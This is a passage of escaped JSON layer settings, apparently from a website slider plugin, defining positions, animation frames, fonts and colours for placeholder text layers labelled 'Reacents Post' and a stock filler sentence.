To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\"},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"19px\",\"e\":true},\"n\":{\"v\":\"19px\",\"e\":true},\"t\":{\"v\":\"19px\"},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"0px\",\"e\":true},\"n\":{\"v\":\"0px\",\"e\":true},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\"},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\"},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"5\":{\"text\":\"Reacents Post\",\"alias\":\"Reacents Post\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-635px\",\"e\":true},\"n\":{\"v\":\"125px\",\"e\":true},\"t\":{\"v\":\"125px\"},\"m\":{\"v\":\"125px\"}},\"y\":{\"d\":{\"v\":\"-130px\",\"e\":true},\"n\":{\"v\":\"376px\",\"e\":true},\"t\":{\"v\":\"376px\"},\"m\":{\"v\":\"376px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\"},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"6\":{\"text\":\"Reacents Post\",\"alias\":\"Reacents Post\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-631px\",\"e\":true},\"n\":{\"v\":\"126px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"246px\"}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"518px\",\"e\":true},\"t\":{\"v\":\"427px\",\"e\":true},\"m\":{\"v\":\"427px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"7\":{\"text\":\"Reacents Post\",\"alias\":\"Reacents Post\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-629px\",\"e\":true},\"n\":{\"v\":\"127px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"164px\",\"e\":true},\"n\":{\"v\":\"665px\",\"e\":true},\"t\":{\"v\":\"571px\",\"e\":true},\"m\":{\"v\":\"571px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"8\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-541px\",\"e\":true},\"n\":{\"v\":\"-421px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"-59px\",\"e\":true},\"n\":{\"v\":\"-21px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[